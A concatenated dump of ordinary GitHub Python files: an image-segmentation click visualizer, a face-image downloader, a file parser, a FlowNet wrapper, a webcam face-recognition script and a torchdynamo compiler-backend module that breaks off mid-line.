im.set_data(self.cmap(tmp_labels.reshape(self.rows, self.cols)))\n im.autoscale()\n fig.canvas.draw_idle()\n\n def pressed(self, ev):\n if ev.key == 'p':\n print(\"Split mode...\")\n self.mode = 'split'\n elif ev.key == 'j':\n print(\"Join mode...\")\n self.mode = 'join'\n\n def visualize(self, labels: np.ndarray,\n rgb: np.ndarray = None,\n depth: np.ndarray = None,\n dendogram: np.ndarray = None) -> None:\n self.rows, self.cols = labels.shape\n self.current_labels = np.ones((self.rows, self.cols), dtype=np.int32)\n self.current_labels.fill(dendogram.max() + 1)\n self.mode = 'split'\n self.cmap = plt.cm.get_cmap('tab20')\n\n fig, ax = plt.subplots()\n im = ax.imshow(self.cmap(self.current_labels), vmin=0, vmax=255)\n im.autoscale()\n fig.canvas.mpl_connect('button_release_event', lambda ev: self.clicked(ev, ax, fig, im, dendogram))\n fig.canvas.mpl_connect('key_press_event', lambda ev: self.pressed(ev))\n plt.show()\n","repo_name":"Reichenbachian/UnsupervisedSegmentation","sub_path":"usac/visualizations/click_split.py","file_name":"click_split.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19193968739","text":"import os, time, requests, argparse\nfrom io import BytesIO\nfrom PIL import Image\n\nURL = \"https://www.thispersondoesnotexist.com/image\"\nSLEEP = 1\nOUTPUT_FILENAME_PATTERN = \"data/person_{:03d}.jpg\"\n\nfileidx = 1\n\ndef get_available_filename():\n global fileidx\n while os.path.isfile(OUTPUT_FILENAME_PATTERN.format(fileidx)):\n fileidx += 1\n return OUTPUT_FILENAME_PATTERN.format(fileidx)\n\n#############################################################################\n# MAIN\n#############################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-n\", \"--num\", default=3, type=int)\nargs = parser.parse_args()\n\nprint(f\"Will download {args.num} image(s)\")\nfor i in range(args.num):\n print(\"Fetching another...\")\n r = requests.get(URL, headers={'User-Agent': 'My User Agent 1.0'})\n i = Image.open(BytesIO(r.content))\n\n filename = get_available_filename()\n print(f\"Saving to {filename}\")\n i.save(filename)\n print(f\"Sleeping {SLEEP} second(s)\")\n time.sleep(SLEEP)\n","repo_name":"eguendelman/scatterface","sub_path":"tools/download_people.py","file_name":"download_people.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21143524624","text":"import csv\nimport xmltodict\nimport yaml\nimport json\n\ndef convertTxtToDict(txtFile):\n txtDict = {}\n with open(txtFile, 'r') as f:\n for line in f:\n key, value = line.strip().split(\":\")\n txtDict[key] = value\n return txtDict\n \ndef convertCsvToDict(csvFile):\n csvDict = {}\n with open(csvFile, mode='r') as infile:\n reader = csv.DictReader(infile, skipinitialspace=True)\n csvDict = [r for r in reader]\n return csvDict\n\ndef convertXmlToDict(xmlFile):\n with open(xmlFile, 'r', encoding='utf-8') as file:\n xmlFromFile = file.read()\n return xmltodict.parse(xmlFromFile)\n\ndef convertYmlToDict(ymlFile):\n ymlDict = {}\n with open(ymlFile) as f:\n ymlDict = yaml.safe_load(f)\n return ymlDict\n\ndef convertJsonToDict(jsonFile):\n jsonDict = {}\n with open(jsonFile) as f:\n jsonDict = json.load(f)\n return jsonDict\n","repo_name":"StortM/SI","sub_path":"04-basic-servers/python/fileParser.py","file_name":"fileParser.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30648733869","text":"from data.flownet import FlowNet\nfrom torchvision import transforms\n\nclass FlowNetWrapper:\n\n def __init__(self) -> None:\n self.flownet = FlowNet()\n self.to_tensor_and_norm_rgb = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),\n ]\n )\n\n def getFlow(self, im1, im2):\n im1 = self.to_tensor_and_norm_rgb(im1).unsqueeze(0).cuda()\n im2 = self.to_tensor_and_norm_rgb(im2).unsqueeze(0).cuda()\n flow_, conf_ = self.flownet(im1, im2)\n return flow_.squeeze().data.cpu().numpy().transpose(1, 2, 0)\n\n def getSample(self, im, flow):\n return self.flownet.sample(im,flow)","repo_name":"manishmanu/VideoVirtualTryon-HCAI-Project","sub_path":"test/data/flownet_wrapper.py","file_name":"flownet_wrapper.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28285202868","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# pylint: disable=C0103\n# pylint: disable=E1101\n\nimport sys\nimport time\nimport numpy as np\nimport tensorflow as tf\nimport cv2\n\nfrom utils import label_map_util\nfrom utils import visualization_utils_color as vis_util\nfrom datetime import datetime\nimport uuid\nimport dlib\nimport face_recognition\nimport facenet\nimport mysql.connector\n\nfrom functions import *\n\nfrom scipy import misc\n\n# Path to frozen detection graph. This is the actual model that is used for the object detection.\nPATH_TO_CKPT = './model/frozen_inference_graph_face.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = './protos/face_label_map.pbtxt'\n\npathtofacenet = './model/testmodel/20180402-114759.pb'\n\npose_predictor_68_point = dlib.shape_predictor('./shape_predictor_68_face_landmarks.dat')\nface_encoder = dlib.face_recognition_model_v1('./model/dlib_face_recognition_resnet_model_v1.dat')\n\n\n\nNUM_CLASSES = 2\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\nminsize = 20\ninput_image_size = 160\n\n# mydb = mysql.connector.connect(\n# host=\"127.0.0.1\",\n# port='3311',\n# user=\"root\",\n# passwd=\"Amitsaini374\",\n# auth_plugin='sha256_password',\n# database=\"Aknownymousdb\"\n# )\n# mycursor = mydb.cursor()\n\n\n# read 20170512-110547 model file downloaded from https://drive.google.com/file/d/0B5MzpY9kBtDVZ2RpVDYwWmxoSUk\n\n# Get input and output tensors\n\n\nclass TensoflowFaceDector(object):\n def __init__(self, PATH_TO_CKPT):\n \"\"\"Tensorflow detector\n \"\"\"\n\n self.detection_graph = tf.Graph()\n with self.detection_graph.as_default():\n od_graph_def = tf.compat.v1.GraphDef()\n with tf.compat.v1.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\n\n with self.detection_graph.as_default():\n config = tf.compat.v1.ConfigProto()\n config.gpu_options.allow_growth = True\n self.sess = tf.compat.v1.Session(graph=self.detection_graph, config=config)\n self.windowNotSet = True\n\n\n def run(self, image):\n \"\"\"image: bgr image\n return (boxes, scores, classes, num_detections)\n \"\"\"\n\n image_np = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # the array based representation of the image will be used later in order to prepare the\n # result image with boxes and labels on it.\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n\n start_time = time.time()\n (boxes, scores, classes, num_detections) = self.sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n elapsed_time = time.time() - start_time\n\n print('inference time cost: {}'.format(elapsed_time))\n\n\n return (boxes, scores, classes, num_detections)\n\n\nclass TensoflowFaceReckon(object):\n \"\"\"docstring for ClassName\"\"\"\n def __init__(self, pathtofacenet):\n facenet.load_model(\"./model/testmodel/20180402-114759.pb\")\n self.images_placeholder = tf.compat.v1.get_default_graph().get_tensor_by_name(\"input:0\")\n self.embeddings = tf.compat.v1.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n self.phase_train_placeholder = tf.compat.v1.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n self.embedding_size = self.embeddings.get_shape()[1]\n self.sess = tf.compat.v1.Session()\n \n\n\n\n def getEmbedding(self, resized):\n self.reshaped = resized.reshape(-1,input_image_size,input_image_size,3)\n self.feed_dict = {self.images_placeholder: self.reshaped, self.phase_train_placeholder: False}\n embedding = self.sess.run(self.embeddings, feed_dict=self.feed_dict)\n return embedding\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) != 2:\n print (\"usage:%s (cameraID | filename) Detect faces\\\n in the video example:%s 0\"%(sys.argv[0], sys.argv[0]))\n exit(1)\n\n try:\n camID = int(sys.argv[1])\n except:\n camID = sys.argv[1]\n \n tDetector = TensoflowFaceDector(PATH_TO_CKPT)\n\n tReckon = TensoflowFaceReckon(pathtofacenet)\n\n\n cap = cv2.VideoCapture(camID)\n windowNotSet = True\n while True:\n ret, image = cap.read()\n if ret == 0:\n break\n\n [h, w] = image.shape[:2]\n #print (h, w)\n\n (boxes, scores, classes, num_detections) = tDetector.run(image)\n\n\n\n [height, width] = image.shape[:2]\n\n max_boxes_to_draw = boxes.shape[0]\n\n z= np.squeeze(boxes)\n s= np.squeeze(scores)\n c= np.squeeze(classes).astype(np.int32)\n n=np.squeeze(num_detections).astype(np.int32)\n #print(c)\n\n max_box=z.shape[0]\n\n\n \n\n for i in range(max_box):\n if s[i] > 0.75 and c[i]==1:\n bx = z[i]\n ymin = int(bx[0]*height)\n xmin = int(bx[1]*width)\n ymax = int(bx[2]*height)\n xmax = int(bx[3]*width)\n\n if((xmax-xmin)>10 and (ymax-ymin)>10 and bx.any() ):\n\n # this function is for the first image\n\n t1 = cv2.imread('amit5.jpg')\n resize1 = cv2.resize(t1, (160, 160))\n resize12=facenet.prewhiten(resize1)\n emb2= tReckon.getEmbedding(resize1)\n\n # this function is for the second image\n\n\n cv2.imshow('input1', resize1)\n #print(emb2)\n\n # t2 = cv2.imread('amit7.jpg')\n # resize1 = cv2.resize(t2, (160, 160))\n # resize13=facenet.prewhiten(resize1)\n # emb3= tReckon.getEmbedding(resize13)\n\n\n\n \n # this function is for the live feed delivered to the python function\n\n\n Result = np.array(image[ymin:ymax,xmin:xmax])\n a= uuid.uuid4()\n inimg = image[ymin-30:ymax+30,xmin-30:xmax+30]\n resize15 = cv2.resize(inimg, (160, 160))\n resize=facenet.prewhiten(resize15)\n\n\n\n cv2.imshow('input2', resize15)\n #cv2.imwrite(\"E:/aknownymous/tensorflow-face-detection-master/images/\" + str(a) + \".jpg\", resize15)\n \n\n\n emb1= tReckon.getEmbedding(resize15)\n\n rez = np.sum(emb2*emb1,axis=1)\n print('cosine')\n\n print(rez)\n print('eculidian')\n\n dist = np.sqrt(np.sum(np.square(np.subtract(emb1[0,:],emb2[0,:]))))\n print(dist)\n\n # sql = \"SELECT * FROM aknownymousdb.id_encoding_table\"\n # mycursor.execute(sql)\n\n # myresult = mycursor.fetchall()\n\n # for x in myresult:\n # print(x)\n\n\n\n\n\n\n\n\n\n if windowNotSet is True:\n #cv2.namedWindow(\"tensorflow based (%d, %d)\" % (w, h), cv2.WINDOW_NORMAL)\n windowNotSet = False\n\n #cv2.imshow(\"tensorflow based (%d, %d)\" % (w, h), image)\n k = cv2.waitKey(1) & 0xff\n if k == ord('q') or k == 27:\n break\n\n cap.release()\n","repo_name":"amitsaini0001/focus-face-recognition-with-tensorflow","sub_path":"inference_usbCam_face.py","file_name":"inference_usbCam_face.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30324500100","text":"import copy\nimport functools\nimport io\nimport logging\nimport os\nimport subprocess\nimport tempfile\n\nfrom typing import Dict\n\nimport numpy as np\n\nimport torch\nfrom ..output_graph import CompilerFn\n\nfrom ..utils import identity\nfrom .subgraph import SubGraph\n\nlog = logging.getLogger(__name__)\nBACKENDS: Dict[str, CompilerFn] = dict()\n_NP_DTYPE = {\n torch.float16: np.float16,\n torch.float32: np.float32,\n torch.float64: np.float64,\n torch.uint8: np.uint8,\n torch.int8: np.int8,\n torch.int16: np.int16,\n torch.int32: np.int32,\n torch.int64: np.longlong,\n torch.bool: np.bool_,\n}\n\n\ndef register_backend(fn):\n @functools.wraps(fn)\n def inner(gm, example_inputs, **kwargs):\n return fn(gm, example_inputs, **kwargs)\n\n BACKENDS[fn.__name__] = inner\n return inner\n\n\ndef create_backend(fn):\n @functools.wraps(fn)\n def inner(model, example_inputs=None, **kwargs):\n if model is None:\n return None\n\n if not isinstance(model, SubGraph):\n with tempfile.TemporaryDirectory() as tmp:\n return inner(SubGraph(model, example_inputs, tmp), **kwargs)\n else:\n assert example_inputs is None\n\n try:\n return fn(model, **kwargs)\n except KeyboardInterrupt:\n raise\n\n BACKENDS[fn.__name__] = inner\n return inner\n\n\n@create_backend\ndef eager(subgraph):\n return subgraph.model\n\n\n@create_backend\ndef ts(subgraph):\n return subgraph.scripted\n\n\ndef reload_jit_model(subgraph, opt_fn=identity):\n tmp = io.BytesIO()\n torch.jit.save(subgraph.scripted, tmp)\n tmp.seek(0)\n model = torch.jit.load(tmp)\n model = opt_fn(model)\n # populate cache\n for _ in range(3):\n model(*subgraph.example_inputs)\n return model\n\n\ndef reload_jit_model_ofi(subgraph):\n return reload_jit_model(subgraph, torch.jit.optimize_for_inference)\n\n\n@create_backend\ndef nnc(subgraph):\n with torch.jit.fuser(\"fuser1\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef nnc_ofi(subgraph):\n with torch.jit.fuser(\"fuser1\"):\n return reload_jit_model_ofi(subgraph)\n\n\n@create_backend\ndef ts_nvfuser(subgraph):\n with torch.jit.fuser(\"fuser2\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef ts_nvfuser_ofi(subgraph):\n with torch.jit.fuser(\"fuser2\"):\n return reload_jit_model_ofi(subgraph)\n\n\n@create_backend\ndef onednn(subgraph):\n with torch.jit.fuser(\"fuser3\"):\n return reload_jit_model(subgraph)\n\n\n@create_backend\ndef ofi(subgraph):\n return torch.jit.optimize_for_inference(subgraph.scripted)\n\n\n@create_backend\ndef static_runtime(subgraph):\n scripted = subgraph.scripted\n if hasattr(scripted, \"_c\"):\n static_module = torch._C._jit_to_static_module(scripted._c)\n else:\n static_module = torch._C._jit_to_static_module(scripted.graph)\n return subgraph.wrap_returns(static_module)\n\n\ndef onnxrt_common(subgraph, provider, onnx_filename=None):\n import onnxruntime # type: ignore[import]\n\n assert provider in onnxruntime.get_available_providers()\n session = onnxruntime.InferenceSession(\n onnx_filename or subgraph.onnx_filename, providers=[provider]\n )\n input_names = subgraph.input_names\n output_names = subgraph.output_names\n create_outputs = subgraph.empty_outputs_factory()\n is_cpu = subgraph.is_cpu\n\n def _call(*initial_args):\n binding = session.io_binding()\n args = [a.contiguous() for a in initial_args]\n for name, value in zip(input_names, args):\n dev = value.device\n binding.bind_input(\n name,\n dev.type,\n dev.index or 0,\n _NP_DTYPE[value.dtype],\n value.size(),\n value.data_ptr(),\n )\n outputs = create_outputs()\n for name, value in zip(output_names, outputs):\n dev = value.device\n binding.bind_output(\n name,\n dev.type,\n dev.index or 0,\n _NP_DTYPE[value.dtype],\n value.size(),\n value.data_ptr(),\n )\n session.run_with_iobinding(binding)\n if is_cpu:\n binding.copy_outputs_to_cpu()\n return outputs\n\n return subgraph.wrap_returns(_call)\n\n\n@create_backend\ndef onnxrt_cpu(subgraph):\n return onnxrt_common(subgraph, provider=\"CPUExecutionProvider\")\n\n\n@create_backend\ndef onnxrt_cuda(subgraph):\n return onnxrt_common(subgraph, provider=\"CUDAExecutionProvider\")\n\n\n@create_backend\ndef onnx2tensorrt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n return onnxrt_common(subgraph, provider=\"TensorrtExecutionProvider\")\n\n\n@create_backend\ndef onnxrt_cpu_numpy(subgraph, provider=\"CPUExecutionProvider\"):\n \"\"\"Alternate version that integrates via numpy\"\"\"\n import onnxruntime\n\n assert provider in onnxruntime.get_available_providers()\n ort_session = onnxruntime.InferenceSession(\n subgraph.onnx_filename, providers=[provider]\n )\n\n def to_numpy(x):\n try:\n return x.numpy()\n except RuntimeError:\n return x.detach().numpy()\n\n def _call(*args):\n res = ort_session.run(\n None, {f\"i{i}\": to_numpy(arg) for i, arg in enumerate(args)}\n )\n res = [torch.from_numpy(x) for x in res]\n return res\n\n return subgraph.wrap_returns(_call)\n\n\n@create_backend\ndef onnxrt(subgraph):\n if subgraph.is_cuda:\n return onnxrt_cuda(subgraph)\n else:\n return onnxrt_cpu(subgraph)\n\n\n@functools.lru_cache(None)\ndef _init_tensorflow():\n import tensorflow as tf # type: ignore[import]\n\n # prevent tensorflow from eating all the GPU memory\n gpus = tf.config.list_physical_devices(\"GPU\")\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n return tf\n\n\n@create_backend\ndef onnx2tf(subgraph):\n import onnx # type: ignore[import]\n from onnx_tf.backend import prepare # type: ignore[import]\n\n tf = _init_tensorflow()\n filename = subgraph.filename(\"tensorflow\")\n input_names = subgraph.input_names\n output_names = subgraph.output_names\n device = \"/CPU:0\" if subgraph.is_cpu else f\"/GPU:{subgraph.device_index}\"\n with tf.device(device):\n if not os.path.exists(filename):\n prepare(onnx.load(subgraph.onnx_filename)).export_graph(filename)\n tf_module = tf.saved_model.load(filename)\n tf_module = tf.function(tf_module, jit_compile=True)\n\n def run(*i_args):\n args = [a.contiguous() for a in i_args]\n with tf.device(device):\n outs = tf_module(\n **{\n name: tf.experimental.dlpack.from_dlpack(\n torch.utils.dlpack.to_dlpack(args[idx])\n )\n for idx, name in enumerate(input_names)\n }\n )\n return [\n torch.utils.dlpack.from_dlpack(\n tf.experimental.dlpack.to_dlpack(outs[name])\n )\n for name in output_names\n ]\n\n return subgraph.wrap_returns(run)\n\n\n@create_backend\ndef taso(subgraph):\n taso_filename = subgraph.filename(\"taso\")\n subprocess.check_call(\n [\n os.path.expanduser(\"~/conda/envs/taso/bin/python\"),\n \"-c\",\n \"import taso,onnx; onnx.save(taso.export_onnx(taso.optimize(\"\n f\"taso.load_onnx('{subgraph.onnx_filename}'))), '{taso_filename}')\",\n ]\n )\n return onnxrt_common(\n subgraph, provider=\"CUDAExecutionProvider\", onnx_filename=taso_filename\n )\n\n\n@create_backend\ndef ipex(subgraph, **kwargs):\n import intel_extension_for_pytorch as ipex # type: ignore[import]\n\n inputs = subgraph.example_inputs\n model = subgraph.model\n with torch.no_grad():\n model.eval()\n if kwargs[\"datatype\"] == \"bf16\":\n model = ipex.optimize(model, dtype=torch.bfloat16)\n else:\n model = ipex.optimize(model, dtype=torch.float32)\n try:\n traced_model = torch.jit.trace(model, inputs).eval()\n traced_model = torch.jit.freeze(traced_model)\n return traced_model\n except Exception:\n log.warning(\"JIT trace failed during the 'ipex' optimize process.\")\n return model\n\n\ndef _raise_timeout(signum, frame):\n raise TimeoutError()\n\n\n@create_backend\ndef fx2trt(subgraph, **kwargs):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n from torch_tensorrt.fx.fx2trt import ( # type: ignore[import]\n InputTensorSpec,\n TRTInterpreter,\n )\n from torch_tensorrt.fx.passes.lower_basic_pass import ( # type: ignore[import]\n transform_setitem,\n )\n from torch_tensorrt.fx.tools.trt_splitter import ( # type: ignore[import]\n TRTSplitter,\n TRTSplitterSetting,\n )\n from torch_tensorrt.fx.tracer.acc_tracer import acc_tracer # type: ignore[import]\n from torch_tensorrt.fx.trt_module import TRTModule # type: ignore[import]\n from torch_tensorrt.fx.utils import LowerPrecision # type: ignore[import]\n\n from .normalize import normalize_ir\n\n try:\n model = subgraph.model\n inputs = subgraph.example_inputs\n # normalize\n model = normalize_ir(model, inputs)\n # pass rewrite\n model = transform_setitem(model, inputs)\n acc_model = acc_tracer.trace(model, inputs)\n # Split out unsupported ops\n splitter_setting = TRTSplitterSetting()\n splitter_setting.use_implicit_batch_dim = False\n splitter = TRTSplitter(acc_model, inputs, settings=splitter_setting)\n splitter.node_support_preview()\n split_mod = splitter()\n num_piece = 0\n for name, _ in split_mod.named_children():\n print(f\"graph is split into {name}\")\n num_piece += 1\n\n # if the graph module is split into pieces larger than 8, we consider its perf\n # is not good and fall back to non-TRT\n if num_piece > 8:\n print(\n f\"The graph module is split into {num_piece} which is large than the \\\n threshold=8. Fall back to non-TRT module.\"\n )\n return None\n\n if \"fp16_mode\" in kwargs and kwargs[\"fp16_mode\"]:\n precision = LowerPrecision.FP16\n else:\n precision = LowerPrecision.FP32\n\n def get_submod_inputs(mod, submod, inputs):\n acc_inputs = None\n\n def get_input(self, inputs):\n nonlocal acc_inputs\n acc_inputs = inputs\n\n handle = submod.register_forward_pre_hook(get_input)\n mod(*inputs)\n handle.remove()\n return acc_inputs\n\n for name, _ in split_mod.named_children():\n if \"_run_on_acc\" in name:\n submod = getattr(split_mod, name)\n # print(\"acc=\",submod.code)\n # Get submodule inputs for fx2trt\n acc_inputs = get_submod_inputs(split_mod, submod, inputs)\n\n # fx2trt replacement\n interp = TRTInterpreter(\n submod,\n InputTensorSpec.from_tensors(acc_inputs),\n explicit_batch_dimension=True,\n )\n r = interp.run(\n max_workspace_size=20 << 30,\n lower_precision=precision,\n # profiling_verbosity=trt.ProfilingVerbosity.DETAILED, #For profile\n )\n # For profile\n # from fx2trt_oss.fx.tools.trt_profiler_sorted import profile_trt_module\n # profile_trt_module(\"\", trt_mod, acc_inputs)\n trt_mod = TRTModule(*r)\n\n setattr(split_mod, name, trt_mod)\n else:\n submod = getattr(split_mod, name)\n # print(\"gpu=\",submod.code)\n return subgraph.wrap_returns(split_mod)\n except Exception:\n log.exception(\"FX2TRT conversion error\")\n return None\n\n\n@create_backend\ndef torch2trt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n from torch2trt import torch2trt # type: ignore[import]\n\n inputs = subgraph.example_inputs\n trt_mod = torch2trt(\n subgraph.model,\n inputs,\n max_batch_size=len(inputs[0]),\n strict_type_constraints=True,\n )\n return subgraph.wrap_returns(trt_mod)\n\n\n@create_backend\ndef tensorrt(subgraph):\n if subgraph.will_tensorrt_barf():\n # TensorRT fails violently with an abort() on this\n return None\n\n model = onnx2tensorrt(subgraph)\n if model is None:\n model = torch2trt(subgraph)\n return model\n\n\n@create_backend\ndef cudagraphs(subgraph):\n model = subgraph.model\n inputs = subgraph.example_inputs\n assert subgraph.is_cuda\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\n@create_backend\ndef cudagraphs_ts(subgraph):\n assert subgraph.is_cuda\n model = subgraph.scripted\n inputs = subgraph.example_inputs\n\n # warmup\n for _ in range(3):\n model(*inputs)\n\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\n@create_backend\ndef cudagraphs_ts_ofi(subgraph):\n assert subgraph.is_cuda\n model = torch.jit.optimize_for_inference(torch.jit.freeze(subgraph.scripted))\n inputs = subgraph.example_inputs\n\n # warmup\n for _ in range(3):\n model(*inputs)\n\n return subgraph.wrap_returns(cudagraphs_inner(model, inputs))\n\n\ndef cudagraphs_inner(model, inputs, copy_outputs=True):\n assert isinstance(inputs, (list, tuple))\n static_inputs = [torch.zeros_like(x) for x in inputs]\n\n # warmup\n torch.cuda.synchronize()\n stream = torch.cuda.Stream()\n stream.wait_stream(torch.cuda.current_stream())\n with torch.cuda.stream(stream):\n model(*inputs)\n stream.synchronize()\n torch.cuda.current_stream().wait_stream(stream)\n torch.cuda.synchronize()\n\n # record\n graph = torch.cuda.CUDAGraph()\n with torch.cuda.graph(graph, stream=stream):\n static_outputs = model(*static_inputs)\n if not isinstance(static_outputs, (list, tuple)):\n static_outputs = (static_outputs,)\n\n def run(*new_inputs):\n assert len(static_inputs) == len(new_inputs)\n for dst, src in zip(static_inputs, new_inputs):\n dst.copy_(src)\n graph.replay()\n if copy_outputs:\n return [x.clone() for x in static_outputs]\n else:\n return static_outputs\n\n return run\n\n\ndef tvm_compile(jit_mod, example_inputs, log_file=None, **kwargs):\n if jit_mod is None:\n return None\n try:\n return tvm_compile_inner(jit_mod, example_inputs, None, log_file, **kwargs)\n except Exception as e:\n if log_file and os.path.exists(log_file):\n os.unlink(log_file)\n if isinstance(e, KeyboardInterrupt):\n raise\n log.exception(\"tvm error\")\n return None\n\n\n@create_backend\ndef tvm(subgraph):\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=None,\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@create_backend\ndef ansor(subgraph):\n \"\"\"\n WARNING: this backend takes hours or days to train and\n often produces a slower result than the default schedule.\n \"\"\"\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=\"auto_scheduler\",\n log_file=subgraph.filename(\"ansor\"),\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@create_backend\ndef tvm_meta_schedule(subgraph):\n return subgraph.wrap_returns(\n tvm_compile_inner(\n subgraph.scripted,\n subgraph.example_inputs,\n tuning_option=\"meta_schedule\",\n trials=20000,\n cuda=subgraph.is_cuda,\n )\n )\n\n\n@functools.lru_cache(None)\ndef llvm_target():\n if \"avx512\" in open(\"/proc/cpuinfo\").read():\n return \"llvm -mcpu=skylake-avx512\"\n return \"llvm -mcpu=core-avx2\"\n\n\ndef tvm_compile_inner(\n jit_mod, example_inputs, tuning_option=None, log_file=None, trials=20000, cuda=False\n):\n try:\n import tvm # type: ignore[import]\n from tvm import relay # type: ignore[import]\n from tvm.contrib import graph_executor # type: ignore[import]\n\n shape_list = [(f\"inp_{idx}\", i.shape) for idx, i in enumerate(example_inputs)]\n mod, params = relay.frontend.from_pytorch(jit_mod, shape_list)\n if cuda:\n dev = tvm.cuda(0)\n target = tvm.target.cuda()\n else:\n dev = tvm.cpu(0)\n target = tvm.target.Target(llvm_target())\n\n if tuning_option == \"auto_scheduler\":\n from tvm import auto_scheduler\n\n if log_file is None:\n log_file = tempfile.NamedTemporaryFile()\n if not os.path.exists(log_file):\n tasks, task_weights = auto_scheduler.extract_tasks(\n mod[\"main\"], params, target\n )\n for task in tasks:\n print(task.compute_dag)\n else:\n print(\"No tasks\")\n if len(tasks) != 0:\n tuner = auto_scheduler.TaskScheduler(tasks, task_weights)\n if not os.path.exists(log_file):\n assert trials > 0\n tune_option = auto_scheduler.TuningOptions(\n num_measure_trials=trials,\n measure_callbacks=[auto_scheduler.RecordToFile(log_file)],\n early_stopping=2000,\n )\n try:\n tuner.tune(tune_option)\n except Exception:\n if os.path.exists(log_file):\n os.unlink(log_file)\n raise\n\n with auto_scheduler.ApplyHistoryBest(log_file):\n with tvm.transform.PassContext(\n opt_level=3, config={\"relay.backend.use_auto_scheduler\": True}\n ):\n lib = relay.build(mod, target=target, params=params)\n elif tuning_option == \"meta_schedule\":\n from os import path as osp\n\n from tvm import meta_schedule as ms\n\n with tempfile.TemporaryDirectory() as work_dir:\n if log_file is not None:\n assert osp.isdir(\n log_file\n ), \"TVM's meta_schedule requires a directory for storing log files.\"\n work_dir = log_file\n # TODO(shingjan): This could be replaced by tvm.contrib.torch.optimize_torch\n # once USE_PT_TVMDSOOP is updated and turned on by default in TVM.\n database = ms.relay_integration.tune_relay(\n mod=mod,\n target=target,\n work_dir=work_dir,\n max_trials_global=20000,\n num_trials_per_iter=64,\n params=params,\n strategy=\"evolutionary\",\n )\n lib = ms.relay_integration.compile_relay(\n database=database,\n mod=mod,\n target=target,\n params=params,\n )\n\n elif tuning_option is None:\n # no autotuning (for debugging)\n with tvm.transform.PassContext(opt_level=10):\n lib = relay.build(mod, target=target, params=params)\n else:\n raise NotImplementedError(\n \"This tuning option is invalid/not implemented for torchdynamo's TVM-related backend. \"\n \"There are three available options including None, auto_scheduler and meta_schedule.\"\n )\n m = graph_executor.GraphModule(lib[\"default\"](dev))\n\n def to_torch_tensor(nd_tensor):\n \"\"\"A helper function to transfer a NDArray to torch.tensor.\"\"\"\n if nd_tensor.dtype == \"bool\":\n # DLPack does not support boolean so it can't be handled by\n # torch.utils.dlpack.from_pack. Workaround by going through\n # numpy, although this brings additional data copy overhead.\n return torch.from_numpy(nd_tensor.numpy())\n return torch.utils.dlpack.from_dlpack(nd_tensor.to_dlpack())\n\n def exec_tvm(*i_args):\n args = [a.contiguous() for a in i_args]\n for idx, arg in enumerate(args, 0):\n if arg.dim() != 0:\n if arg.requires_grad:\n arg = arg.detach()\n m.set_input(\n f\"inp_{idx}\",\n tvm.nd.array(arg.numpy(), dev),\n )\n m.run()\n return [\n to_torch_tensor(m.get_output(i)) for i in range(m.get_num_outputs())\n ]\n\n return exec_tvm\n except Exception:\n log.exception(\"tvm error\")\n return jit_mod # explicit fall back to eager\n\n\n@functools.lru_cache(None)\ndef _init_ltc():\n try:\n import torch._lazy.extract_compiled_graph\n from torch._lazy.ts_backend import init as init_ts_backend\n\n # hopefully changing this line to sth like _ltc_init_xla_backend in future\n # will enable XLA\n init_ts_backend()\n\n return torch._lazy\n except ModuleNotFoundError as e:\n print(f\"ltc backend fails. Can not import {e.name}\")\n raise\n\n\ndef ltc_reuse_graph(gm: torch.fx.GraphModule, example_inputs):\n ltc = _init_ltc()\n return ltc.extract_compiled_graph.extract_compiled_graph(gm, 